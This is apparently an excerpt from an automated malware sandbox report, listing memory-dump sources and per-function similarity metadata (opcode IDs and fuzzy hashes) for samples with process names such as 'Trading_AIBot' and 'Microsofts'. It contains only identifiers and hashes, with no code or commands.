                                                                                                                                              • Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3016257755-0
                                                                                                                                              • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                              • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                                              • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                              • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Jdq
                                                                                                                                              • API String ID: 0-1891755625
                                                                                                                                              • Opcode ID: 011f3c1ce60ed323d5a9496acee76d9ddc1f448774136cddeaa23e4b598c2eb4
                                                                                                                                              • Instruction ID: 8a69c423890cd1b2992afd42d4314eec489c474e2db0d7aa44137dd8a2b95642
                                                                                                                                              • Opcode Fuzzy Hash: 011f3c1ce60ed323d5a9496acee76d9ddc1f448774136cddeaa23e4b598c2eb4
                                                                                                                                              • Instruction Fuzzy Hash: 34711474D40218CFCB14EFA4D990AADBBB6FF89300F209569D409BB264DB316D8ACF40
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 609706b5a36e9eb70be0148c30d444048d6bcc350aaf86efcb906fa9ed754ddb
                                                                                                                                              • Instruction ID: af474543fa62899c0a524d350f1383ba6805375eb6c9910306cbf493a17dec84
                                                                                                                                              • Opcode Fuzzy Hash: 609706b5a36e9eb70be0148c30d444048d6bcc350aaf86efcb906fa9ed754ddb
                                                                                                                                              • Instruction Fuzzy Hash: ED51F0B4D40248DFDF14DFE8D584AAEFBB6AF58310F20802AE415BB290CB759946CF54
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 75f71fb652cc68b6408d946c90a4a234da9f5bfcd015ed9ca6203060560f79bc
                                                                                                                                              • Instruction ID: 0db2d5a34721b4d97e037b5c2f694db17a43aea77aece55eb655aa721363eb23
                                                                                                                                              • Opcode Fuzzy Hash: 75f71fb652cc68b6408d946c90a4a234da9f5bfcd015ed9ca6203060560f79bc
                                                                                                                                              • Instruction Fuzzy Hash: 7341EAB4D00248DFDB04DFEAC984A9EFBBAAF59310F24802AE418BB250D7749946CF44
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0252a0a2d53454a6dfb7ffdcd0e7aa25d9ce4206cac1747079a443e3cc11e5f0
                                                                                                                                              • Instruction ID: 608246bc76ed502c3d4fc0b13d8fcd0884a2433a568686b735722316d82a01f1
                                                                                                                                              • Opcode Fuzzy Hash: 0252a0a2d53454a6dfb7ffdcd0e7aa25d9ce4206cac1747079a443e3cc11e5f0
                                                                                                                                              • Instruction Fuzzy Hash: 0941EBB4D00248DFDB04DFEAC984A9EFBBABF59310F24802AE418BB250D7749946CF44
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Jdq
                                                                                                                                              • API String ID: 0-1891755625
                                                                                                                                              • Opcode ID: 75e08f1cc6fa6f905db68e255585bd4a87796b12edca7b60a3dfc29c1c9f6889
                                                                                                                                              • Instruction ID: 71d0c7a35ba79af9d4c13361c46a095ba955e06ef6b3f20785ce07d27828c299
                                                                                                                                              • Opcode Fuzzy Hash: 75e08f1cc6fa6f905db68e255585bd4a87796b12edca7b60a3dfc29c1c9f6889
                                                                                                                                              • Instruction Fuzzy Hash: 50410574E412089FDB04DFA8D894AEEBBF2FF89301F10806AE515B72A0DB359945CF91
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 41cd5da16632cd1e4aa6908f01b446d86eee1aae020e74b5a10c669e99e3ea93
                                                                                                                                              • Instruction ID: bee1a250824211534f461173e659c0b19ac09c37402836435ae8451fa91054cf
                                                                                                                                              • Opcode Fuzzy Hash: 41cd5da16632cd1e4aa6908f01b446d86eee1aae020e74b5a10c669e99e3ea93
                                                                                                                                              • Instruction Fuzzy Hash: 69B2E174A41229DFCB65EF64C894B9EB7B2BF49304F2085E9D40DA7265DB319E81CF40
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6b85b890d1a7f02c58da5ee42827319daf213adda61e612bcf581bf60391b60e
                                                                                                                                              • Instruction ID: f356e5e92d6be3f430fddf2e88cdad229d39937ae1b938750b4e9d42d87ab014
                                                                                                                                              • Opcode Fuzzy Hash: 6b85b890d1a7f02c58da5ee42827319daf213adda61e612bcf581bf60391b60e
                                                                                                                                              • Instruction Fuzzy Hash: 2BB2E074A41229DFCB65EF64C894B9EB7B2BF49304F2085E9D40DA7265DB319E81CF40
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1fd257916b2b3f9ee9ec46d12a30e9ac59337da547b649e100a535b28e674ba8
                                                                                                                                              • Instruction ID: 5e0d8ac43a5bcca180131fd50a91ba6cc1a8c6096c8d5d606b1bc60d42855edf
                                                                                                                                              • Opcode Fuzzy Hash: 1fd257916b2b3f9ee9ec46d12a30e9ac59337da547b649e100a535b28e674ba8
                                                                                                                                              • Instruction Fuzzy Hash: 1962CC74A01229DFCB65DF64D994B9EBBB2FF49300F1080AAD40AA7365DB319E85CF40
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0e7e3711d76a7fa2ae2ec1b0ace6692fbaaacf7255a9d8cfedfe6ef7df47d823
                                                                                                                                              • Instruction ID: 5ebfbaf1e0622e811593dce86547e15ad6f1bad8cdc8bc243710184fd884977a
                                                                                                                                              • Opcode Fuzzy Hash: 0e7e3711d76a7fa2ae2ec1b0ace6692fbaaacf7255a9d8cfedfe6ef7df47d823
                                                                                                                                              • Instruction Fuzzy Hash: BC62CC74A01229DFDB69DF64D994B9EBBB2FF49300F1081A9D40AA7364DB319E85CF40
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 37c5f82a21e67045584dfd35ba31063457c7aaa9e0b5cf8251ea67271e0a9fc9
                                                                                                                                              • Instruction ID: 5a1eb652d04609515e97acb386e4699d9b252de6b260c2df22ec59bbf1156fce
                                                                                                                                              • Opcode Fuzzy Hash: 37c5f82a21e67045584dfd35ba31063457c7aaa9e0b5cf8251ea67271e0a9fc9
                                                                                                                                              • Instruction Fuzzy Hash: 5C41C1B4D40248DFDB14DFA9C584AAEFFF5AF59300F24846AE444AB290D7745986CF50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2b68d309fe5598836a493d5aab4150a8f53e9b5d0365a35fc4cb1206f6814371
                                                                                                                                              • Instruction ID: 722ac4765f1f4270dee270f4a4f85cbc805e417d7aa8c15f716ebd765844adc1
                                                                                                                                              • Opcode Fuzzy Hash: 2b68d309fe5598836a493d5aab4150a8f53e9b5d0365a35fc4cb1206f6814371
                                                                                                                                              • Instruction Fuzzy Hash: FCB1BD78A01228CFDB64DF68C984B9EB7B6BB49304F1085EAD40DA7351DB31AE85CF51
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7c5eabe4bd29a9d6b76632cc921ed68c3efba547a3d61120cc4eb64833883cfe
                                                                                                                                              • Instruction ID: a4faa6e0a47400775610ea34d072fdf1cca989d995a845c6d7a130230472e857
                                                                                                                                              • Opcode Fuzzy Hash: 7c5eabe4bd29a9d6b76632cc921ed68c3efba547a3d61120cc4eb64833883cfe
                                                                                                                                              • Instruction Fuzzy Hash: 6251C278A40248CFCB48DFA9D99499DBBF6FF49310F209159E816AB365DB31AC06CF14
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 66554816c16a404ab5710a859f6b4814a35870022b3c99526900c5d9f7bdb291
                                                                                                                                              • Instruction ID: 42a5699f2e4a1a247986baa2208aea0a05a6efbc64af70891e09bd5b2da56454
                                                                                                                                              • Opcode Fuzzy Hash: 66554816c16a404ab5710a859f6b4814a35870022b3c99526900c5d9f7bdb291
                                                                                                                                              • Instruction Fuzzy Hash: 2651EC78D40358DFCB04EFA9D4946EDBBF5BF59304F20842AD42AAB2A1DB345946CF40
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4779a09b1ddf198c28fec277e07db67db746929169bb4a757ac98da53bd6bfae
                                                                                                                                              • Instruction ID: 73bd0103afd6ace3f006e044fad84e9b05d2f58414de2006ae20b3e5d65a6cc5
                                                                                                                                              • Opcode Fuzzy Hash: 4779a09b1ddf198c28fec277e07db67db746929169bb4a757ac98da53bd6bfae
                                                                                                                                              • Instruction Fuzzy Hash: 4141CEB4D002489FDB14DFEAC584AAEFFF5AF58310F24802AE418AB290DB745986CF50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 975f1f85faade657bcb7c9d375b393cd6b2ca1fc44ee9b4b19781360b08da4f8
                                                                                                                                              • Instruction ID: fc37aaf1d015d797b510c114c7ce53a539e18e874fe313f57932973bbc7425d2
                                                                                                                                              • Opcode Fuzzy Hash: 975f1f85faade657bcb7c9d375b393cd6b2ca1fc44ee9b4b19781360b08da4f8
                                                                                                                                              • Instruction Fuzzy Hash: 7E31C174E40209DFCB09DBB4D590AEEB7B2AF89304F2094AAD415B73A0CB366D41CF65
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 67901cd3152d48af916055ef09a0297c9974504e4f06f7a67165ebad19f40ed0
                                                                                                                                              • Instruction ID: 9ad8520ff40d2ebe631c6d19833fcaa0f87a9529d9507b9a155c7195eb5c5c27
                                                                                                                                              • Opcode Fuzzy Hash: 67901cd3152d48af916055ef09a0297c9974504e4f06f7a67165ebad19f40ed0
                                                                                                                                              • Instruction Fuzzy Hash: 0321E274E40209DFCB08DBA5C490AEEB7B2EF89304F20946AD415B7390CB366D41CF65
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1a44b5cacf2c4d02c234d8834ec518aadd7591c5d00a787a216d2e078ee83b1f
                                                                                                                                              • Instruction ID: 92b45eca4721df90822dfa6c8732cc0dd5b0607678a315fae3e638fdb62f6dd9
                                                                                                                                              • Opcode Fuzzy Hash: 1a44b5cacf2c4d02c234d8834ec518aadd7591c5d00a787a216d2e078ee83b1f
                                                                                                                                              • Instruction Fuzzy Hash: 5521BB70C09385DFCB06AFB4D8587AEBFB1EF06309F15489EC082A71A2DB781645DB81
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5a950e7a60efdc957e9a309777edf6aed9ac81e3f31cef1661b2c035983c84ac
                                                                                                                                              • Instruction ID: 62d175c2be89f4c1d5f39a0b7fd28dab4c91d9cc43b3683a609f719df76918d3
                                                                                                                                              • Opcode Fuzzy Hash: 5a950e7a60efdc957e9a309777edf6aed9ac81e3f31cef1661b2c035983c84ac
                                                                                                                                              • Instruction Fuzzy Hash: 4B01BC74C54209DFDB04EFB4C41CBAEBBF0EB05305F5089A98012B3290D7780644DF90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 46e1e35a587a996ca9b54b89709ea49beed74d3a1df1dc420433a43b7250c26a
                                                                                                                                              • Instruction ID: 1a3e32afd19962c1ba42664b2a78e972ca050c0c33b7a7abb61effe76e653a5e
                                                                                                                                              • Opcode Fuzzy Hash: 46e1e35a587a996ca9b54b89709ea49beed74d3a1df1dc420433a43b7250c26a
                                                                                                                                              • Instruction Fuzzy Hash: 860175B9D402588EDB11EFA4C4987AEFFB5AB24310F20444CD001AB291CBB94882CF50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 296a1c9e7fa9d37ef5fac44b2a362b13353d9740dbf03d3ebe83991548c31b00
                                                                                                                                              • Instruction ID: 536054543322c9deadb01fb65328cbf5233ab3f6ba8f2e9321c0d1cc5c4f5699
                                                                                                                                              • Opcode Fuzzy Hash: 296a1c9e7fa9d37ef5fac44b2a362b13353d9740dbf03d3ebe83991548c31b00
                                                                                                                                              • Instruction Fuzzy Hash: 23F08CB8D10196CFCB24DFA4D448BACBBB0EF5A312F1064AAD009B3220CB309982CF14
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ef2389d40ad31fd5d177eb918f602611475ddc51167cf231a55fbeca6bb0ecb0
                                                                                                                                              • Instruction ID: dd31e0a33a12a19ac89af831334adcb46c06b40a882a5ba0a8ae44f8fdba83a3
                                                                                                                                              • Opcode Fuzzy Hash: ef2389d40ad31fd5d177eb918f602611475ddc51167cf231a55fbeca6bb0ecb0
                                                                                                                                              • Instruction Fuzzy Hash: B9F082B4914204DFC701EF68D954958BFB0FB4A311F1001EAD844DB3A1EB318D41CB41
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c389e7ad65dce245dbea9127fb1c399e0aa01fdeb38d048ea5a5942103a7be34
                                                                                                                                              • Instruction ID: bcc791bd8982b27e31f09ec31a7e159075c17e1518db18bc573e7001c65f9d01
                                                                                                                                              • Opcode Fuzzy Hash: c389e7ad65dce245dbea9127fb1c399e0aa01fdeb38d048ea5a5942103a7be34
                                                                                                                                              • Instruction Fuzzy Hash: 17E02230944189CFC709EF20EA65AACBB34EF15301F408BDED40627162DB362F04DB41
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 26086177e3979abd9912d26b0446bd4dedf742a64f2dc4edda1f68e59da1778c
                                                                                                                                              • Instruction ID: b539c25003d154aff97c087715aa4af09870fdd418f2be996172955fe0799278
                                                                                                                                              • Opcode Fuzzy Hash: 26086177e3979abd9912d26b0446bd4dedf742a64f2dc4edda1f68e59da1778c
                                                                                                                                              • Instruction Fuzzy Hash: 1BE01AB8E10208DFC744EF68E988A59BBB4FB09311F1041A9D80893365E7319D45CB80
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9a8d6f8583049a3f1a6c21658f525500455d872bdadcf288db9a9aeb863bded0
                                                                                                                                              • Instruction ID: 5b006c9e159492a39adb18f76b8646b999de627c9e285b8210c1c88c0d759db8
                                                                                                                                              • Opcode Fuzzy Hash: 9a8d6f8583049a3f1a6c21658f525500455d872bdadcf288db9a9aeb863bded0
                                                                                                                                              • Instruction Fuzzy Hash: C3E08670941108EFD701EFB4EA05A9DB7BDEB44314F508A69D405A3211EB366E14DB80
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ab97ccb6d42306eacd5717170fa668c0c749aab7c3f798baefc924a444fff363
                                                                                                                                              • Instruction ID: 2d8b4b273f9c94d432826805019988ddb49c64e543ff4ac4938cbb4b9de5caba
                                                                                                                                              • Opcode Fuzzy Hash: ab97ccb6d42306eacd5717170fa668c0c749aab7c3f798baefc924a444fff363
                                                                                                                                              • Instruction Fuzzy Hash: 29E0C23088D2548FC301AFA49804E94BF74DF07326F0001DDD0644B1A2EB314810D791
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a0cc1237bd33d98d96f7c82448b5afb8bc7afe55629430a3108f93bf99f0b21c
                                                                                                                                              • Instruction ID: 7a4732781b8e2712915bff16bf356cbe7b2edb41c7f5b1e0c81514fd6ee2fbdb
                                                                                                                                              • Opcode Fuzzy Hash: a0cc1237bd33d98d96f7c82448b5afb8bc7afe55629430a3108f93bf99f0b21c
                                                                                                                                              • Instruction Fuzzy Hash: 43D05B3045A2814FC7195B656959EA0BB34DB07315F010BCAD0A5071B2D7654855D756
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: af4baf2a2c6521611c6aa74898bb944837249473fc681012067a750f7b34a820
                                                                                                                                              • Instruction ID: f94c3cc432cae3f3aad8e42a1840c0edfa72077eecb3e3ac5da333d6add5a772
                                                                                                                                              • Opcode Fuzzy Hash: af4baf2a2c6521611c6aa74898bb944837249473fc681012067a750f7b34a820
                                                                                                                                              • Instruction Fuzzy Hash: 46C08070D552189FD300FFB8A805F59FF7CDB02316F40015CE41853241D7754450DAD5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.2538019587.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_21c0000_Trading_AIBot.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f4a2c0e03ba64129663978b36c21e9fdb27fbca639121878d4d2414c46ea7bfb
                                                                                                                                              • Instruction ID: dd606f4fb3c15f51f73059d572b55203d785f8c05d9c0498cc98b48f8b5c5c79
                                                                                                                                              • Opcode Fuzzy Hash: f4a2c0e03ba64129663978b36c21e9fdb27fbca639121878d4d2414c46ea7bfb
                                                                                                                                              • Instruction Fuzzy Hash: 86C08C70C6524C9FC314DFAAA809F69FB7CE702316F4002ACE91863201EB728850D7E6
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
                                                                                                                                              • API String ID: 0-99275883
                                                                                                                                              • Opcode ID: 5b91296c5d5392da394e08ad71f8fa67466dc81a9546b28b3e2dcbb795807a39
                                                                                                                                              • Instruction ID: b409ab2e665e3e6127b07eb198f6240789660e7888da2697ee2987f0b212e1f5
                                                                                                                                              • Opcode Fuzzy Hash: 5b91296c5d5392da394e08ad71f8fa67466dc81a9546b28b3e2dcbb795807a39
                                                                                                                                              • Instruction Fuzzy Hash: 2D824A34A00209DFCB14CF68D995EAEBBF2BF49328F158559F916AB2A1D730ED41CB50
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
